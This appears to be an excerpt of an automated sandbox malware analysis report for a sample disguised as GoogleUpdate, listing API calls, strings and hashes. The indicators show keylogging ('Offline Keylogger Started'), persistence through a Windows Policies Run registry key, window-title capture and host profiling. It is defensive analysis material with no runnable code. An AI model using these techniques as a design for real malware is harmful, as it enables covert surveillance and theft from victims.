                                • Opcode ID: 0b970088cbc172ce3b0f8ed072908de03e6d7713b03aec3cda7e5915f8f0f445
                                • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                                • Opcode Fuzzy Hash: 0b970088cbc172ce3b0f8ed072908de03e6d7713b03aec3cda7e5915f8f0f445
                                • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,0gj), ref: 00412104
                                • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000410,?), ref: 0041211D
                                • RegCloseKey.KERNEL32(00000000), ref: 00412128
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: 0gj$exepath
                                • API String ID: 3677997916-2174403247
                                • Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                                • Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
                                • Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                                • Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4
                                APIs
                                • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041220F
                                • RegSetValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,?,?,00000001,00469654,0gj,exepath,00472248,?,?,004111FF), ref: 0041223E
                                • RegCloseKey.KERNEL32(?,?,?,00000001,00469654,0gj,exepath,00472248,?,?,004111FF,?,00000000), ref: 00412249
                                Strings
                                • 0gj, xrefs: 00412204
                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041220D
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: 0gj$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                • API String ID: 1818849710-3317721874
                                • Opcode ID: 9a02877a10190b6426cbfd8bde816d16f795bd4c81ace352a3103f59058ff894
                                • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                                • Opcode Fuzzy Hash: 9a02877a10190b6426cbfd8bde816d16f795bd4c81ace352a3103f59058ff894
                                • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
                                APIs
                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,004098DF,?,00000000,00000000), ref: 0041A1D7
                                • CloseHandle.KERNEL32(00000000,?,004098DF,?,00000000,00000000), ref: 0041A1E3
                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004098DF,?,00000000,00000000), ref: 0041A1F4
                                • CloseHandle.KERNEL32(00000000,?,004098DF,?,00000000,00000000), ref: 0041A201
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreatePointerWrite
                                • String ID:
                                • API String ID: 1852769593-0
                                • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                                • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
                                • CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
                                • CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7
                                  • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                  • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTimewsprintf
                                • String ID: Offline Keylogger Started
                                • API String ID: 465354869-4114347211
                                • Opcode ID: 6be413687ec7e6cf8a6aae081c0db350f6bf135ed0b5d0c64268afb77a753199
                                • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                                • Opcode Fuzzy Hash: 6be413687ec7e6cf8a6aae081c0db350f6bf135ed0b5d0c64268afb77a753199
                                • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
                                • RegCloseKey.KERNEL32(?), ref: 00411F7D
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: pth_unenc
                                • API String ID: 3677997916-4028850238
                                • Opcode ID: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
                                • Instruction ID: 6ec0a72befc52f1c009cc632a5b728b25634ffaa8485c37bac66e7b8b5c78dc5
                                • Opcode Fuzzy Hash: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
                                • Instruction Fuzzy Hash: 31F01D7694020CBFDF109FA09C45FEE7BBCEB04B11F1041A5BA04E6191D2359A54DB94
                                APIs
                                  • Part of subcall function 004120E8: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,0gj), ref: 00412104
                                  • Part of subcall function 004120E8: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000410,?), ref: 0041211D
                                  • Part of subcall function 004120E8: RegCloseKey.KERNEL32(00000000), ref: 00412128
                                • Sleep.KERNEL32(00000BB8), ref: 004111DF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQuerySleepValue
                                • String ID: 0gj$H"G$exepath
                                • API String ID: 4119054056-2016326341
                                • Opcode ID: 4d79a96d07bca113a25038c1cd8dde356977a82d44cbfaf5a453a5d21e194478
                                • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                                • Opcode Fuzzy Hash: 4d79a96d07bca113a25038c1cd8dde356977a82d44cbfaf5a453a5d21e194478
                                • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0041A23C
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041A261
                                • CloseHandle.KERNEL32(00000000), ref: 0041A26F
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                • Opcode ID: f1251b9d043b1816c7bddaf3ccd168bdb61cdb2151e11f70954b411bc85d9a2d
                                • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                                • Opcode Fuzzy Hash: f1251b9d043b1816c7bddaf3ccd168bdb61cdb2151e11f70954b411bc85d9a2d
                                • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                • RegCloseKey.KERNEL32(?), ref: 00411FDD
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 7a1544548b3f7c2bdbc79f0242f37fe977c23e2c99779a8425445d9686f74cb1
                                • Instruction ID: 7c5a36a74d232ee299d7294234303f181ef10811f7d8c913f13e4634b011a18e
                                • Opcode Fuzzy Hash: 7a1544548b3f7c2bdbc79f0242f37fe977c23e2c99779a8425445d9686f74cb1
                                • Instruction Fuzzy Hash: 2D01D676900218BBCB209B95DD08DEF7F7DDB84751F000166BB05A3150DB748E46D7B8
                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
                                • RegSetValueExA.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,?,?,00412385,?,00000000), ref: 00412196
                                • RegCloseKey.ADVAPI32(00000000,?,?,00412385,?,00000000,?,?,?,?,0gj,00472248), ref: 004121A1
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID:
                                • API String ID: 1818849710-0
                                • Opcode ID: f22ae03cc73ffd9918ec88d2fef4797e03461f2c2f39713df9249136138d9c6b
                                • Instruction ID: 4e2890e51e7d784523b6c6e9c9a916a8daaabc2f4381c7e0ff06ecafce147d70
                                • Opcode Fuzzy Hash: f22ae03cc73ffd9918ec88d2fef4797e03461f2c2f39713df9249136138d9c6b
                                • Instruction Fuzzy Hash: 5AF0F632100208BFCB00EFA0DD45DEE373CEF04751F104226BD09A61A2D7359E10DB94
                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412276
                                • RegSetValueExA.KERNEL32(?,?,00000000,00000004,?,00000004,?,?,?,00410B8A,0046403C,00000000), ref: 00412291
                                • RegCloseKey.KERNEL32(?,?,?,?,00410B8A,0046403C,00000000), ref: 0041229C
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID:
                                • API String ID: 1818849710-0
                                • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                                • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                                APIs
                                • _wcslen.LIBCMT ref: 00408F39
                                  • Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
                                  • Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
                                  • Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$_wcslen
                                • String ID: 88i
                                • API String ID: 1119755333-4140304445
                                • Opcode ID: b8b574ec300864d8d5f0b61b564e6d8bf291a5e157000126fc34229c0f587ccd
                                • Instruction ID: bde1965b6f08766bd400bb9d626b3f4fd5e121562736213e95ba31f4244dc5e2
                                • Opcode Fuzzy Hash: b8b574ec300864d8d5f0b61b564e6d8bf291a5e157000126fc34229c0f587ccd
                                • Instruction Fuzzy Hash: 86218F719040899ACB09FFB5DD528EE7BB5AE51308F00003FF941722E2DE785A49DA99
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00433049,?,P@,004365E7,?,?,00000000,?,P@,0040C88A,00433049,?,?,?,?), ref: 0044367B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID: P@
                                • API String ID: 1279760036-676759640
                                • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                                • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 004197AB
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: GlobalMemoryStatus
                                • String ID: @
                                • API String ID: 1890195054-2766056989
                                • Opcode ID: 257335e8d7f90f302e1c63bcee3e650057a1d083b4c07430f2bdd1a346c4e461
                                • Instruction ID: 916baa9f79c233f702b1e805244b950efce88069b4bce771f790cc973d6f5f79
                                • Opcode Fuzzy Hash: 257335e8d7f90f302e1c63bcee3e650057a1d083b4c07430f2bdd1a346c4e461
                                • Instruction Fuzzy Hash: 6DD017B58023189FC720DFA8E904A8DBBFCFB08214F00026AEC49E3300E770A8008B84
                                APIs
                                • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00471E90,00471E90), ref: 0041A893
                                • LocalFree.KERNEL32(?,?), ref: 0041A8B9
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: FormatFreeLocalMessage
                                • String ID:
                                • API String ID: 1427518018-0
                                • Opcode ID: 7914be0bb51d727ecb147dfc24e1e6cc4771dcb9d7df002be239442017c2ad70
                                • Instruction ID: 5f5c77436e78e5d49d2704262acff0899a585b39497b2c8097545773f5be8339
                                • Opcode Fuzzy Hash: 7914be0bb51d727ecb147dfc24e1e6cc4771dcb9d7df002be239442017c2ad70
                                • Instruction Fuzzy Hash: B6F0A430B002096ADB18A766DD4ADFFB72DDB94305B10013FB515B22D1EAB85E069A5A
                                APIs
                                • GetComputerNameExW.KERNEL32(00000001,?,00000037,00471FFC), ref: 00419615
                                • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Name$ComputerUser
                                • String ID:
                                • API String ID: 4229901323-0
                                • Opcode ID: bc1d19bd62bd99057b7f44f52ab1f34f4f39e14c1e12de22008ea1118711f052
                                • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                                • Opcode Fuzzy Hash: bc1d19bd62bd99057b7f44f52ab1f34f4f39e14c1e12de22008ea1118711f052
                                • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 238a90e17962ef4b1f002eb86d9ec1d4f78461c129c2d14368e201ad837faa61
                                • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                                • Opcode Fuzzy Hash: 238a90e17962ef4b1f002eb86d9ec1d4f78461c129c2d14368e201ad837faa61
                                • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D
                                APIs
                                • GetForegroundWindow.USER32(?,00471E78), ref: 00419A9B
                                • GetWindowTextW.USER32(00000000,?,00000200), ref: 00419AAA
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$ForegroundText
                                • String ID:
                                • API String ID: 29597999-0
                                • Opcode ID: 15702703b5202debf026d83c8502143a7b58117ce6a26c879db5ece8c8543682
                                • Instruction ID: cf2e52be04f8ec8d08d18c914cdb682983edf2912a2e664b649e3c091a1f3b93
                                • Opcode Fuzzy Hash: 15702703b5202debf026d83c8502143a7b58117ce6a26c879db5ece8c8543682
                                • Instruction Fuzzy Hash: 8FE09B76D0031867EB2067A5EC4DFEBB77CEB84711F0401AEF918D3142E974990486E4
                                APIs
                                • getaddrinfo.WS2_32(00000000,00000000,00000000,0046FACC,00471FFC,00000000,00413BDE,00000000,00000001), ref: 00413961
                                • WSASetLastError.WS2_32(00000000), ref: 00413966
                                  • Part of subcall function 004137DC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                                  • Part of subcall function 004137DC: LoadLibraryA.KERNEL32(?), ref: 0041386D
